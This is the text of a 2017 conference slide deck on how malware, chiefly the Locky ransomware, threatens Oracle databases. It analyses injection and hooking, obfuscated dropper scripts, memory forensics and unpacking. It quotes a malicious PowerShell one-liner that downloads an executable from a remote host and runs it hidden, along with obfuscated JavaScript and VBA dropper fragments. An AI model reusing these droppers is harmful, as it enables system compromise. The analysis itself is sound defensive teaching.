MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...

GUOB TECH DAY 2017 – LA OTN TOUR

(INTRODUCTORY LECTURE FOR DBAs)

By Alexandre Borges

MALWARES ON WINDOWS AND LINUX: THE

WORST THREAT FOR DATABASES

PROFILE AND TOC

• Introduction

• Infection

• Test Environment

• Memory Analysis

• Quick Dynamic and Static Analysis

• Last words

• Malware and Security Researcher.

• Consultant, Instructor and Speaker on Malware

Analysis, Memory Analysis, Digital Forensics,

Rootkits and Software Exploitation.

• Instructor at Oracle, (ISC)2 and EC-Council. Ex-

instructor at Symantec.

• Member of the CHFI Advisory Board in EC-Council.

• Reviewer member of the The Journal of Digital

Forensics, Security and Law.

• Refereer on Digital Investigation:The International

Journal of Digital Forensics & Incident Response

• Author of “Oracle Solaris Advanced Administration

book”

WARNING !!!

• Please, pay attention in the following considerations:

• It is NOT ALLOWED to take pictures of the slides.

• It is NOT ALLOWED to record the lecture.

• It is NOT ALLOWED to film the lecture.

• Please, respect the speaker and his material.

HTTP://ALEXANDREBORGES.ORG 3

INTRODUCTION

• FACT: Malwares are destroying the digital world.

• Several types of malwares:

• Ring 3 (ransomwares included)

• Ring 0 (kernel and bootkits malwares)

• Ring -1 (VMM)

• Ring -2 (SMM)

• Ring -3 ? (Intel Management Engine)

• Number of malwares infecting BIOS / UEFI has been increasing.

• Malwares running on GPU

INTRODUCTION

• Malwares have used several tricks for making the detection harder than the

usual:

• Process hiding (DKOM)

• Process Replacement (Hollowing)

• DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)

• Services hiding + Service Hijacking

• Hidden Sockets

• Code Injection (multiple methods)

• Hooking (code, IAT, EAT)

• Binary hidden in the Registry

INTRODUCTION

DKOM (Direct Kernel

Object Manipulation) on

the processes list.

INTRODUCTION

push param3

push param2

push param1

call good_function

mov ebx, eax

push ebp

mov esp, ebp

...good things...

call bad_function

push ebp

mov esp, ebp

...bad things...

Basic Function Hooking

INTRODUCTION

• NtClose function (from ntdll.dll) being hooked:

0x7c90cfd0 b819000000 MOV EAX, 0x19

0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050

0x7c90cfda ffd2 CALL EDX

0x7c90cfdc c20400 RET 0x4

0x7c90cfdf 90 NOP

0x7c90cfe0 b81a000000 MOV EAX, 0x1a

0x7c90cfe5 ba DB 0xba

0x7c90cfe6 0003 ADD [EBX], AL

Hooking

INTRODUCTION

0x7c900050 b203 MOV DL, 0x3

0x7c900052 eb08 JMP 0x7c90005c

0x7c900054 b204 MOV DL, 0x4

0x7c900056 eb04 JMP 0x7c90005c

0x7c900058 b205 MOV DL, 0x5

0x7c90005a eb00 JMP 0x7c90005c

0x7c90005c 52 PUSH EDX

0x7c90005d e804000000 CALL 0x7c900066

0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL

0x7c90006a 6e OUTS DX, BYTE [ESI]

Hooking

Anti-disassembly

trick.

INTRODUCTION

• And about Injection techniques? There are many methods:

• Remote DLL Injection it is easily detected because the DLL

must be on disk before being injected.

• PE Injection a PE file, which has its IAT configured for the

target process, is written and forced to be executed into the

addressing space of the target process.

• Reflective Injection it is similar to the previous one, but the

code (usually a DLL) manages its initialization.

• APC Injection a malicious code is executed by attaching to an

APC (Asynchronous Procedure Call) of the target thread.

INTRODUCTION

• Other tricks:

• Hooking SSDT

• Hooking IDT

• Orphan Threads

• IRP Hooking

• Hiding kernel drivers

• Bypassing KCS (Kernel Code Signing)

• Callbacks

• Filtering Drivers

INTRODUCTION

• The analysis can be difficult because there are several anti -analysis techniques:

• Anti-Debugging

• Anti-Disassembly

• Anti-VMware

• Packers (common and virtualized ones)

• Obfuscation

• .NET tricks

• Powershell + WMI

INTRODUCTION

• There are many threats infecting firmwares, which are persistent and stealth.

• They can replace the OS boot loader, patch the kernel, and so on...

• Petya (MBR ransomware)

• Mebromi (BIOS rootkit)

• Gapz (BIOS parameter block modification)

• TDL4

INTRODUCTION

https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

INTRODUCTION

• http://privacy-pc.com/articles/ransomware-chronicle.html

INTRODUCTION - KASPERSKY OVERALL

STATISTICS FOR 2016

https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_

2016_Statistics_ENG.pdf

INTRODUCTION - KASPERSKY OVERALL

STATISTICS FOR 2016

https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_

2016_Statistics_ENG.pdf

INTRODUCTION - SYMANTEC INTERNET

SECURITY THREAT REPORT 2016

https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

Huh? Are you sure

that Linux systems are

safe against malwares?

INFECTION

• Malwares have three main goals when they infect a system:

• Owning the system for using it in future attacks

• Stealing data

• Hijacking data (ransomwares)

• We know the main techniques for infection:

• E-mail

• USB

• Network sharing

• Exploiting vulnerabilities (remember WannaCry)

INFECTION

Click to die

INFECTION

Obfuscated code. However, it is trivial

to solve it.

INFECTION

Obfuscated code. Again, it is trivial to solve it.

INFECTION

• function nomusta(prototu){return prototu.replace(/AA/g,"");}

• var fuka = new

ActiveXObject(nomusta("MSXAAML2.XMLHTAATP")

• fuka.open(jacob[3-2],

""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);

• XMLHttpRequest object

• Represents an XML request using HTTP.

• It has an open method that requests a synchronous or

asynchronous file download from a specific URL.

INFECTION

• XMLHttpRequest object also has a send method,

which sends an HTTP request to the server and

receives a response.

• function zulum(pikue) {pikue.send( );}

• zulum(fuka);

• function hust(gulibator){eval(gulibator);}

• hust(gusar);

INFECTION

Click to die

INFECTION

Probably, the malware’s author wants to execute something bad on your system.

INFECTION

Sub Document_Open( )

urgixbe = "gwefakqyrb"

If (odbumuwgi = 811) Then

If (osduzu = "icdyclaw") Then

hnevo = Shell(ibovuhl, unymk)

niwwyshomq = Empty

tnovgistoqme = "58732" & 18

sgukkezihh = "46106" & 81

Again, obfuscated code. Once more, It is very simple

to bypass it.

INFECTION

"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -

nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT

SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/

search.php','%appdaTA%.ExE');start-prOceSS

'%AppDatA%.Exe'""

I have not shown the desobfuscation process because it is really simple.

TEST ENVIRONMENT

WINDOWS 8

x64 Internet

WINDOWS 8

Oracle Database

12.2 installed

Oracle Instant Client

12.2 installed

TEST ENVIRONMENT

• LISTENER.ORA

TEST ENVIRONMENT

• TNSNAMES.ORA

TEST ENVIRONMENT

C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))

Enter password: Malware123!

Connected to:

Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name from v$instance;

INSTANCE_NAME

------------------------------------------------

TEST ENVIRONMENT

Infected with Locky (version JUL/30/2017)

TEST ENVIRONMENT

Encrypted database

files. On Windows,

you are lucky because

it prevents two

processes to alter the

same file at same time.

On Linux...no luck

TEST ENVIRONMENT

Photo from Twitter of my colleague Valerie Thomas (@hacktress09 )

After Oracle database being encrypted by the ransomware....

MEMORY ANALYSIS

Probably, the ransomware is destroying snapshots

MEMORY ANALYSIS

Running as administrator

MEMORY ANALYSIS

DLLs that are responsible for

accessing the network/Internet ;)

32-bit code running on x64. Of course.

MEMORY ANALYSIS

Class Identifier registry. Is COM present?

Interesting Registry entries.

MEMORY ANALYSIS

Few URLs on the memory

MEMORY ANALYSIS

Locky ransomware connecting to C2 (Command

and Control Server).

MEMORY ANALYSIS

Russia...again?

MEMORY ANALYSIS

VAD Short and RWE.

Code Injection,of course.

VAD == Virtual Address

Descriptor)

MEMORY ANALYSIS

Three injected code saved on disk. Pay attention: three different hashes.

MEMORY ANALYSIS

Interesting string

references and DLLs.

MEMORY ANALYSIS

It is a hooking, but this

specific one is not

important right now

QUICK STATIC AND DYNAMIC

ANALYSIS

QUICK STATIC AND DYNAMIC ANALYSIS

It seems that our malware is the Locky

ransomware, isn’t it?

Take a look at

the entropy.

Boring to reverse

High entropy.

Encrypted

Overlay

MFC (Microsoft Foundation Class) It is a collection of classes commonly

used in object oriented programming. Usually, MFC could be though as a wrapper for

windows API (similar a “proxy” role) that are written in C++.

No import

The IDAPro shows us

all function names

inside the MFC42.dll ,

but the reversing

analysis is very boring.

There is not any

Crypto function.

Classic unpacking process, loading DLLs one by one.

These new segments are

coming from VirtualAlloc( )

calls. Eventually, it could be

the unpacked executable

that we are looking for.

They are good signs Therefore, we can save this dump to disk.

The Crypto

functions

have arisen!

At this point

your life changes

(desperately

looking for a

backup).

from CryptImportKey( )

from CryptCreateHash( )

CryptSetKeyParam(hOriginalKey, AB_IV, new_IV)

while(block = NextBlockEncoding())

hDuplicateKey = CryptDuplicateKey(hOriginalKey)

CryptEncrypt(hDuplicateKey, block)

CryptDestroyKey(hDuplicateKey)

Usual place to set up

the persistence.

Looking for all file extensions to

encrypt their respective files and this

data reference is the list of all them!

Few extensions that are looked

by the ransomware and, among

them, .dbf (from Oracle

databases).

Connect to author’s

server using username

and password.

We could use

Wireshark, couldn’t we ?

REMEMBER

We are always in CONTROL...

THANK YOU FOR ATTENDING MY LECTURE!

LinkedIn: http://www.linkedin.com/in/aleborges

Twitter: @ale_sp_brazil

Blog: http://alexandreborges.org

E-mail: alexandreborges@blackstormsecurity.com

• Malware and Security Researcher.

• Consultant, Instructor and Speaker on Malware

Analysis, Memory Analysis, Digital Forensics,

Rootkits and Software Exploitation.

• Instructor at Oracle, (ISC)2 and EC-Council. Ex-

instructor at Symantec.

• Member of the CHFI Advisory Board in EC-Council.

• Reviewer member of the The Journal of Digital

Forensics, Security and Law

• Refereer on Digital Investigation:The International

Journal of Digital Forensics & Incident Response

• Author of “Oracle Solaris Advanced Administration

book”

MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...

Documents

GPU Malwares Now the evil hides in video cards Malwares – Now the evil hides in video cards Alexandre Borges Malwares – concepts and types and definitions What’s a malware? •

Intercepting System API Calls - Intel Developer Zone...DLL Injection This section is entirely based on the MSDN article, "Escape from DLL Hell with Custom Debugging and Instrumentation

DDoS-Capable IoT Malwares: Comparative Analysis and Mirai … · DDoS-Capable IoT Malwares: Comparative Analysis and Mirai Investigation MicheleDeDonno ,1 NicolaDragoni ,1,2 AlbertoGiaretta

Function classification for the retro-engineering of malwares

Unidade 2 malwares e ataques

Identifying and Removing Malwares

WMI - A FRONT DOOR FOR MALWARES

Desenvolvimento de Malwares com C#

The Past and Future of Mobile Malwares

DDoS-Capable IoT Malwares: Comparative Analysis …DDoS-Capable IoT Malwares: Comparative Analysis and Mirai Investigation MicheleDeDonno ,1 NicolaDragoni ,1,2 AlbertoGiaretta ,2 andAngeloSpognardi3

Introduction à l’analyse de Malwares - IGMigm.univ-mlv.fr/~dr/XPOSE2013/introduction_analyse... · 2014-03-20 · Introduction à l’analyse de Malwares Author: Mickael Created

Chronicles of Malwares and Detection Systems

Detection and Removal of Malwares

Code/DLL Injection

Devenir Analyste de Malwares

introduction to malwares,virus,trojan horse

Gunpack : un outil générique d'unpacking de malwares · malwares Julien Lenoir julien.lenoir@airbus.com Airbus Group Innovation Résumé. L'outil Gunpack n'est pas à proprement

Virus y malwares

Undetectable Malwares: A Brief Surveyitcs16.yolasite.com/resources/malware.pdf · 2. History of Undetectable Malwares Polymorphic Malwares Due to the powerful toolkits such as “The

Unix malwares Myth or reality - ZenK-Security · Unix malwares Myth or reality ? 2 Agenda 1. A bit of history on Unix malwares 2. Why should anyone want to target Unix platforms and